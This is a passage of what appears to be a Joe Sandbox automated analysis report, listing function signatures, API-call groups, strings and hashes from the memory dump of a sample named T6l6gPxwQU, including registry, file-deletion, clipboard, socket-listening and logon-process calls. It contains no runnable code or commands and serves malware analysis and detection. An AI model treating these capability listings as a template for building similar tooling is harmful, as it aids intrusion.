                                                                        • Instruction Fuzzy Hash: 49512832B4CB028AEB589B68F45927D37A1FB89748F144439DA0EC3BA4DE7CE4568344
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                        • API String ID: 281475176-2761157908
                                                                        • Opcode ID: 3ce6d098dea06b582cd2cb2e4a3c36d83b3aa6360c3263b8f2a886e09f514321
                                                                        • Instruction ID: cc96414a3116f4c52914607593fa273132ef446d71c59187aa87adf9974df8c7
                                                                        • Opcode Fuzzy Hash: 3ce6d098dea06b582cd2cb2e4a3c36d83b3aa6360c3263b8f2a886e09f514321
                                                                        • Instruction Fuzzy Hash: 60B2C272A082868BE7658E6DD4406FD37A5FB8978CF505135DB0B97BA9DF38E904CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CloseValue$ConnectCreateRegistry
                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                        • API String ID: 3314541760-966354055
                                                                        • Opcode ID: 425c424f695c2dd20d82d234265c98afdeeedd32987be99b8c64668a2890cfd0
                                                                        • Instruction ID: 05a2854a0717aa3fc0c10cbbf45e7a55e1cfb7aeb2767d81080f6e7c94d89551
                                                                        • Opcode Fuzzy Hash: 425c424f695c2dd20d82d234265c98afdeeedd32987be99b8c64668a2890cfd0
                                                                        • Instruction Fuzzy Hash: E1025C26B08A8285EB10DF2AD4912AD37A4FB8DB9CB059432DF0D9B766DF38E545C740
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: P
                                                                        • API String ID: 0-3110715001
                                                                        • Opcode ID: e72118c0d96e0102c5b40f29b553151352ee296625f047164934555310371132
                                                                        • Instruction ID: af19c207c837b9ccc76e76747eddc51b9176aeac3e61f35f9d3ee7f91a2e783d
                                                                        • Opcode Fuzzy Hash: e72118c0d96e0102c5b40f29b553151352ee296625f047164934555310371132
                                                                        • Instruction Fuzzy Hash: 62A18F32A0864186F724DF29E4542BAB761FB8DB8CF548136DB9E83AA4CF7CE545C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                        • API String ID: 3232708057-3289030164
                                                                        • Opcode ID: 814f0e17d8d2bbad75fd670c3d6fe38e01099dff03db83368ac82057212a78ab
                                                                        • Instruction ID: 62d084fda2aa3d6695bd5f3932b1ba02acbb0e007d0928bd7d7ada066cf2a142
                                                                        • Opcode Fuzzy Hash: 814f0e17d8d2bbad75fd670c3d6fe38e01099dff03db83368ac82057212a78ab
                                                                        • Instruction Fuzzy Hash: 38D19362B1865395EB10DB69E4510FE6761FB8979CF404132EB4D87AB9EF7CD608CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                        • String ID: *.*
                                                                        • API String ID: 1409584000-438819550
                                                                        • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                        • Instruction ID: 09c67a7d5959746107dc06ed7d6b44cdbaeca135fdc4e7a9153269b77553182d
                                                                        • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                        • Instruction Fuzzy Hash: 8B417221619A4255EB40DB1DE84827963A5FF48BADF845131DE6D876B4DF3CE50ECB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: SendString
                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                        • API String ID: 890592661-1007645807
                                                                        • Opcode ID: 8c75045ae2975b650199124e41f521ffa5447aaf8d5604ea34d6cf9b552b621e
                                                                        • Instruction ID: e7fe2b96e4b9602a071a709ba67d93ef0204e621618ce996fd60674481199a70
                                                                        • Opcode Fuzzy Hash: 8c75045ae2975b650199124e41f521ffa5447aaf8d5604ea34d6cf9b552b621e
                                                                        • Instruction Fuzzy Hash: BA213022B1899292EB20EB28F855A7A6771FF9D74CFD04031DB4D879B9DE2CD909C740
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                        • String ID: *.*
                                                                        • API String ID: 2640511053-438819550
                                                                        • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                        • Instruction ID: 4cd47f514ebcc02a673d05c8fdb98c62962bbc34d7c4c0e24c9476088f4ddd9d
                                                                        • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                        • Instruction Fuzzy Hash: CF414D11A1DA4255EA509B19E8446B963A0FB49BECF905131DE7E876F5EF3CE40ACF00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                        • String ID:
                                                                        • API String ID: 2762341140-0
                                                                        • Opcode ID: 3a66660978b74256e478f4cb36c462460227a0609cb260d38e2b72df45aab120
                                                                        • Instruction ID: 84d308518a2e2356c3e04716d292af6d8314a87b27849ebe1c36610303caf021
                                                                        • Opcode Fuzzy Hash: 3a66660978b74256e478f4cb36c462460227a0609cb260d38e2b72df45aab120
                                                                        • Instruction Fuzzy Hash: 1BC12776A04B8586EB10DF6AE8842AD77A0FB89B98F054036DF4E87775DF38D549C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                        • API String ID: 4194297153-14809454
                                                                        • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                        • Instruction ID: 731d77b31cd91b855a7946cf52b209a2d96dee5638e711a27c15b262ce9b290a
                                                                        • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                        • Instruction Fuzzy Hash: 49412926B08A4695EB109B69D8801BC3771FB8CB9CF558432DB1D83BB5DF38E599CB00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                        • String ID:
                                                                        • API String ID: 2395222682-0
                                                                        • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                        • Instruction ID: 17a5628d6c3bf9056578126b89e82ea31f1c639e80687a62a8f456b0010098c8
                                                                        • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                        • Instruction Fuzzy Hash: 77D13A36B08B4686EB20DF69D4902AD73A1FBA8B8CB504436DF4D97B68DF38D449C340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                        • String ID:
                                                                        • API String ID: 1737998785-0
                                                                        • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                        • Instruction ID: eaaf54c5a1a0b32345324a0069718ba422bd4b7c65815468894dc70dee229a72
                                                                        • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                        • Instruction Fuzzy Hash: 67415772A08A8286EB149B1AE49837C7760FF9DB89F058434DB4E877B2DF7CE0518704
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                        • String ID: \*.*
                                                                        • API String ID: 4047182710-1173974218
                                                                        • Opcode ID: 8afc811527fb99e201d68577d1b03bd085c91ade47ff6067ade4f5a0ec4c1327
                                                                        • Instruction ID: bafdd68eff8969db61316b522b4a248ee0f7e42cb54ebd482e7d060d8a1c0950
                                                                        • Opcode Fuzzy Hash: 8afc811527fb99e201d68577d1b03bd085c91ade47ff6067ade4f5a0ec4c1327
                                                                        • Instruction Fuzzy Hash: 66818B22A1868295FB10DB68E4411FE6B60FF8979CF905032EB8E875BADF7CD546C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                                        • String ID:
                                                                        • API String ID: 540024437-0
                                                                        • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                        • Instruction ID: 01cb6afdc02ce9b047b24d9238a1e4102f6e0f93f644688b7e9f08df367b378a
                                                                        • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                        • Instruction Fuzzy Hash: D8419062A0868286EB20DF2EE4502797760FF89FA8F154630DB5E877A2DF3CE1518704
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                        • API String ID: 0-572801152
                                                                        • Opcode ID: dd79965d0ba62ff07d44b0d9f29dc193ba1526b0ffc83c6dd9deb206d130f64b
                                                                        • Instruction ID: c922ff5035e27b61bcb0b1f11690ffdb03969949ee1bd13a3b733e16773b7dec
                                                                        • Opcode Fuzzy Hash: dd79965d0ba62ff07d44b0d9f29dc193ba1526b0ffc83c6dd9deb206d130f64b
                                                                        • Instruction Fuzzy Hash: 13E16F36A18B8296EB20DF69E4402AD77A4FB8CB9CF504136DB4D97BA4DF38E545C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                        • String ID: \*.*
                                                                        • API String ID: 2649000838-1173974218
                                                                        • Opcode ID: eac801da271dad5c3dedbffc09f324b1d2ee4d57e9dbd9d9ebf402661b424a02
                                                                        • Instruction ID: c6a5a1f90962acc23c80d6ed262be2bb27bb94156a9cc857cc49b90107ab6b91
                                                                        • Opcode Fuzzy Hash: eac801da271dad5c3dedbffc09f324b1d2ee4d57e9dbd9d9ebf402661b424a02
                                                                        • Instruction Fuzzy Hash: C5416822A28A8292EB50DB18E4415FD6360FF98B98F905131EB9EC76B5DF7CD506C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                        • String ID:
                                                                        • API String ID: 1239891234-0
                                                                        • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                        • Instruction ID: 2ea2e91c0bbd75f899e000b4963cfb937e890d9c5437c848b9b746c007de0404
                                                                        • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                        • Instruction Fuzzy Hash: C1315336618B8186EB60CF29E8402AE77A4FB88758F540136EB9D83BA5DF3CD545CB00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                        • String ID:
                                                                        • API String ID: 1413079979-0
                                                                        • Opcode ID: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                        • Instruction ID: b8e3b6316ecec57378f04a6cd00acdf4f75d42f953b3419b9faa73e1f9c758a1
                                                                        • Opcode Fuzzy Hash: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                        • Instruction Fuzzy Hash: 6C318D32608B8586DB608F06F8807AAB7A4FB88B94F14413ADF8D83B24DF3DD545CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                        • String ID: NULL Pointer assignment
                                                                        • API String ID: 1653399731-2785691316
                                                                        • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                        • Instruction ID: 16a1272c5b1b8f7ebee7e74cd7267ebc801b26debfba30afccdfdfb4593d5f1a
                                                                        • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                        • Instruction Fuzzy Hash: E3B15976A04B418AEB10DF69D8801AD7BB1FB88798F500136EF4D97BA9DF38E545CB40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
